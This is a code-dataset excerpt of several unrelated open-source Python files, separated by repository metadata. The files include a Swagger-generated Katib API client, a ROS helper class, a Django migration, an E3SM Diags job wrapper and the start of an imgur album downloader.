print('****** Creating directory %s' % os.path.dirname(output_file))
os.makedirs(os.path.dirname(output_file))
mask = fabio.open(args.mask_file).data
shape = mask.shape
print('looking for images of shape %s' % str(shape))
intensities = []
with h5py.File(input_file, 'r') as fpin:
for im in images(fpin, ignore='instrument', shape=shape):
if not im.shape == integrator.get_shape():
print('skipping data %s' % (str(im.shape)))
continue
out = integrator.integrate1d(data=im, npt=args.nbins, filename=None, mask=mask)
q, I = out.radial, out.intensity
intensities.append(I)
I = np.array(intensities)
with h5py.File(output_file, 'w') as fpout:
fpout['I'] = I
fpout['q'] = q
| 39.1
| 190
| 0.627993
|
01194d8c25f7a9f93c4523b6d9b22ff1bf54455a
| 24,943
|
py
|
Python
|
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1beta1-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from kubeflow.katib.configuration import Configuration
import kubeflow.katib.models
from kubeflow.katib import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/0.1/python'
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
            # Convert a model object to a dict, skipping the
            # `swagger_types` and `attribute_map` attributes and
            # any attribute whose value is None.
            # Attribute names are converted to their JSON keys
            # (via the model's attribute_map) for the request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
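    # Illustrative examples (hypothetical inputs): datetime.date(2021, 1, 2) serializes to
    # '2021-01-02'; a list of such dates is serialized element-wise; a generated model
    # instance is reduced to {json_key: value} via its attribute_map, dropping None attributes.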
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
                klass = getattr(kubeflow.katib.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
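    # Illustrative example (hypothetical parameters): with params={'tags': ['a', 'b']} and
    # collection_formats={'tags': 'csv'} this returns [('tags', 'a,b')]; with the 'multi'
    # format it would instead return [('tags', 'a'), ('tags', 'b')].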
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "wb") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance
| 39.034429
| 96
| 0.551778
|
45089325f885e62408b7fc60eb7ef3b2d75bc4fe
| 2,175
|
py
|
Python
|
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
'''
Copyright (c) 2019, Robot Control and Pattern Recognition Group, Warsaw University of Technology
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Warsaw University of Technology nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL <COPYright HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Author: Maksym Figat
'''
import rospy
import sys
DEFAULT_ROS_FREQUENCY=1
CHANNEL_SIZE=1
TOPIC_TIMEOUT=0.5
class AuxiliaryFunctions:
def __init__(self, frequency):
self._loop_rate=rospy.Rate(frequency)
def isSubsystemOK(self):
return not rospy.is_shutdown()
def shutdownSubsystem(self):
print "Shutting down! - TEST"
rospy.signal_shutdown("Shutting down the node")
def sleep(self):
self._loop_rate.sleep()
def getLoopRate(self,frequency):
return rospy.Rate(frequency)
| 41.826923
| 98
| 0.75954
|
1965bc554a47a5d8fc4eeb55d054a5e552ebd16b
| 49
|
py
|
Python
|
iaso/gpkg/__init__.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 29
|
2020-12-26T07:22:19.000Z
|
2022-03-07T13:40:09.000Z
|
iaso/gpkg/__init__.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 150
|
2020-11-09T15:03:27.000Z
|
2022-03-07T15:36:07.000Z
|
iaso/gpkg/__init__.py
|
BLSQ/iaso
|
95c8087c0182bdd576598eb8cd39c440e58e15d7
|
[
"MIT"
] | 4
|
2020-11-09T10:38:13.000Z
|
2021-10-04T09:42:47.000Z
|
from .export_gpkg import org_units_to_gpkg_bytes
| 24.5
| 48
| 0.897959
|
281a53a8b49319de2ce7f3991f3be1aa468a3445
| 1,200
|
py
|
Python
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 5
|
2018-02-12T03:16:36.000Z
|
2019-09-07T20:36:37.000Z
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 162
|
2018-02-16T05:13:03.000Z
|
2021-05-14T02:47:37.000Z
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 14
|
2018-02-15T05:22:36.000Z
|
2022-02-15T08:24:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-03 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bpay', '0007_auto_20170106_1600'),
]
operations = [
migrations.AddField(
model_name='bpaytransaction',
name='biller_code',
field=models.CharField(default=135111, max_length=10),
preserve_default=False,
),
migrations.AlterField(
model_name='bpaytransaction',
name='car',
field=models.CharField(blank=True, help_text=b'Customer Additional Reference.', max_length=20, null=True),
),
migrations.AlterField(
model_name='bpaytransaction',
name='country',
field=models.CharField(blank=True, help_text=b'Country of payment.', max_length=3, null=True),
),
migrations.AlterField(
model_name='bpaytransaction',
name='discretionary_data',
field=models.CharField(blank=True, help_text=b'Reason for refund or reversal.', max_length=50, null=True),
),
]
| 32.432432
| 118
| 0.616667
|
206a4a80dc9cbb57df5c5281e4360ff61ccc404d
| 12,501
|
py
|
Python
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 3
|
2019-02-06T23:46:36.000Z
|
2022-02-28T01:39:26.000Z
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 62
|
2018-04-30T16:26:48.000Z
|
2021-06-02T18:25:35.000Z
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 4
|
2018-07-26T16:07:07.000Z
|
2021-06-02T12:01:48.000Z
|
"""
A wrapper class around E3SM Diags
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
from bs4 import BeautifulSoup
from processflow.jobs.diag import Diag
from processflow.lib.jobstatus import JobStatus
from processflow.lib.util import render, print_line
class E3SMDiags(Diag):
def __init__(self, *args, **kwargs):
super(E3SMDiags, self).__init__(*args, **kwargs)
self._job_type = 'e3sm_diags'
self._requires = []
self._data_required = []
config = kwargs['config']
custom_args = config['diags']['e3sm_diags'].get(
'custom_args')
if custom_args:
self.set_custom_args(custom_args)
if 'area_mean_time_series' in config['diags']['e3sm_diags']['sets_to_run']:
self._requires.append('timeseries')
self._data_required.append('ts_regrid_atm')
else:
# if config['diags']['e3sm_diags']['sets_to_run'] != ['area_mean_time_series']:
self._requires.append('climo')
self._data_required.append('climo_regrid')
if config['global']['host']:
self._host_path = os.path.join(
kwargs['config']['img_hosting']['host_directory'],
self.short_name,
'e3sm_diags',
'{start:04d}_{end:04d}_vs_{comp}'.format(
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name))
else:
self._host_path = ''
        # setup the output directory, creating it if it doesn't already exist
custom_output_path = config['diags'][self.job_type].get(
'custom_output_path')
if custom_output_path:
self._replace_dict['COMPARISON'] = self._short_comp_name
self._output_path = self.setup_output_directory(custom_output_path)
else:
self._output_path = os.path.join(
config['global']['project_path'],
'output',
'diags',
self.short_name,
self.job_type,
'{start:04d}_{end:04d}_vs_{comp}'.format(
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name))
if not os.path.exists(self._output_path):
os.makedirs(self._output_path)
self.setup_job_args(config)
self.setup_job_params(config)
# -----------------------------------------------
def _dep_filter(self, job):
"""
find the climo/ts job we're waiting for, assuming there's only
one climo/ts job in this case with the same start and end years
"""
if job.job_type not in self._requires:
return False
if job.start_year != self.start_year:
return False
if job.end_year != self.end_year:
return False
if job.job_type == 'timeseries':
if job.run_type != 'atm': # we dont care about lnd/ocn/sea-ice ts jobs
return False
return True
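        # Illustrative example (hypothetical jobs): a 'climo' job spanning the same start/end
        # years passes the filter when 'climo' is in self._requires, while a 'timeseries' job
        # whose run_type is 'lnd' is rejected even if its years match.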
# -----------------------------------------------
def setup_dependencies(self, jobs, *args, **kwargs):
"""
Adds climo jobs from this or the comparison case to the list of dependent jobs
Parameters
----------
jobs (list): a list of the rest of the run managers jobs
optional: comparison_jobs (list): if this job is being compared to
another case, the climos for that other case have to be done already too
"""
if self.comparison != 'obs':
# TODO: get model-vs-model to work for ts
other_jobs = kwargs['comparison_jobs']
try:
self_climo, = [job for job in jobs if self._dep_filter(job)]
except ValueError:
msg = 'Unable to find climo for {}, is this case set to generate climos?'.format(
self.msg_prefix())
raise Exception(msg)
try:
comparison_climo, = [job for job in other_jobs if self._dep_filter(job)]
except ValueError:
                msg = 'Unable to find climo for {}, is that case set to generate climos?'.format(
self.comparison)
raise Exception(msg)
self.depends_on.extend((self_climo.id, comparison_climo.id))
else:
for job in jobs:
if self._dep_filter(job):
self.depends_on.append(job.id)
if not self.depends_on:
raise ValueError('Unable to find job dependencies for {}'.format(str(self)))
# -----------------------------------------------
def execute(self, config, *args, slurm_args=None, dryrun=False, **kwargs):
"""
Generates and submits a run script for e3sm_diags
Parameters
----------
config (dict): the global processflow config object
dryrun (bool): a flag to denote that all the data should be set,
and the scripts generated, but not actually submitted
"""
self._dryrun = dryrun
variables = dict()
if dryrun:
input_path = os.path.join(config['global']['project_path'], 'dummpy_input_path')
else:
input_path, _ = os.path.split(self._input_file_paths[0])
variables['short_test_name'] = self.short_name
variables['test_data_path'] = input_path
variables['test_name'] = self.case
variables['results_dir'] = self._output_path
variables['num_workers'] = config['diags']['e3sm_diags'].get('num_workers', 24)
variables['machine_path_prefix'] = config['diags']['e3sm_diags']['machine_path_prefix']
if isinstance(config['diags']['e3sm_diags']['sets_to_run'], list):
variables['sets_to_run'] = "' , '".join(config['diags']['e3sm_diags']['sets_to_run'])
else:
variables['sets_to_run'] = config['diags']['e3sm_diags']['sets_to_run']
if self.comparison == 'obs':
if 'area_mean_time_series' in config['diags']['e3sm_diags']['sets_to_run']:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_ts_vs_obs.py')
variables['ts_start'] = self.start_year
variables['ts_end'] = self.end_year
variables['ts_test_data_path'] = [x for x in kwargs['depends_jobs'] if x.job_type == 'timeseries'].pop().output_path
else:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_vs_obs.py')
else:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_vs_model.py')
input_path, _ = os.path.split(self._input_file_paths[0])
variables['reference_data_path'] = input_path
variables['ref_name'] = self.comparison
variables['reference_name'] = config['simulations'][self.comparison]['short_name']
# render the parameter file from the template
param_template_out = os.path.join(
config['global']['run_scripts_path'],
'e3sm_diags_{start:04d}_{end:04d}_{case}_vs_{comp}_params.py'.format(
start=self.start_year,
end=self.end_year,
case=self.short_name,
comp=self._short_comp_name))
# remove previous run script if it exists
if os.path.exists(param_template_out):
os.remove(param_template_out)
render(
variables=variables,
input_path=template_input_path,
output_path=param_template_out)
cmd = ['python', param_template_out]
return self._submit_cmd_to_manager(config, cmd)
# -----------------------------------------------
def postvalidate(self, config, *args, **kwargs):
"""
Check that all the links created by the diagnostic are correct
Parameters
----------
config (dict): the global config object
Returns
-------
True if all links are found
False otherwise
"""
return self._check_links(config)
# -----------------------------------------------
def handle_completion(self, filemanager, config, *args, **kwargs):
"""
Perform setup for webhosting
Parameters
----------
config (dict): the global config object
"""
if self.status != JobStatus.COMPLETED:
msg = f'{self.msg_prefix()}: Job failed, not running completion handler'
print_line(msg)
return
else:
msg = f'{self.msg_prefix()}: Job complete'
print_line(msg)
# if hosting is turned off, simply return
if not config['global'].get('host'):
msg = f'{self.msg_prefix()}: Job completion handler done\n'
print_line(msg)
return
msg = f'{self.msg_prefix()}: Setting up webhosting for diagnostic output'
print_line(msg)
self.setup_hosting(
always_copy=config['global'].get('always_copy', False),
img_source=self._output_path,
host_path=self._host_path)
self._host_url = 'https://{server}/{prefix}/{case}/e3sm_diags/{start:04d}_{end:04d}_vs_{comp}/viewer/index.html'.format(
server=config['img_hosting']['img_host_server'],
prefix=config['img_hosting']['url_prefix'],
case=self.short_name,
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name)
msg = f'{self.msg_prefix()}: Webhosting setup complete, diagnostic available at {self._host_url}'
print_line(msg)
msg = f'{self.msg_prefix()}: Job completion handler done\n'
print_line(msg)
# -----------------------------------------------
def _check_links(self, config):
viewer_path = os.path.join(self._output_path, 'viewer', 'index.html')
if not os.path.exists(viewer_path):
if self._has_been_executed:
msg = f'{self.msg_prefix()}: could not find page index at {viewer_path}'
logging.error(msg)
return False
viewer_head = os.path.join(self._output_path, 'viewer')
if not os.path.exists(viewer_head):
msg = '{}: could not find output viewer at {}'.format(
self.msg_prefix(), viewer_head)
logging.error(msg)
return False
missing_links = list()
with open(viewer_path, 'r') as viewer_pointer:
viewer_page = BeautifulSoup(viewer_pointer, 'lxml')
viewer_links = viewer_page.findAll('a')
for link in viewer_links:
link_path = os.path.join(viewer_head, link.attrs['href'])
if not os.path.exists(link_path):
missing_links.append(link_path)
continue
if link_path[-4:] == 'html':
link_tail, _ = os.path.split(link_path)
with open(link_path, 'r') as link_pointer:
link_page = BeautifulSoup(link_pointer, 'lxml')
link_links = link_page.findAll('a')
for sublink in link_links:
try:
sublink_preview = sublink.attrs['data-preview']
except:
continue
else:
sublink_path = os.path.join(
link_tail, sublink_preview)
if not os.path.exists(sublink_path):
missing_links.append(sublink_path)
if missing_links:
msg = f'{self.msg_prefix()}: missing the following links'
logging.error(msg)
logging.error(missing_links)
return False
else:
msg = f'{self.msg_prefix()}: all links found'
logging.info(msg)
return True
# -----------------------------------------------
| 41.257426
| 132
| 0.548036
|
68ff7d8a8cc7132ff605d31a28f1480ed9df87c7
| 6,230
|
py
|
Python
|
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | null | null | null |
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | null | null | null |
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | 1
|
2022-01-07T01:42:43.000Z
|
2022-01-07T01:42:43.000Z
|
#!/usr/bin/env python3
# encoding: utf-8
"""
imguralbum.py - Download a whole imgur album in one go.
Provides both a class and a command line utility in a single script
to download Imgur albums.
MIT License
Copyright Alex Gisby <alex@solution10.com>
"""
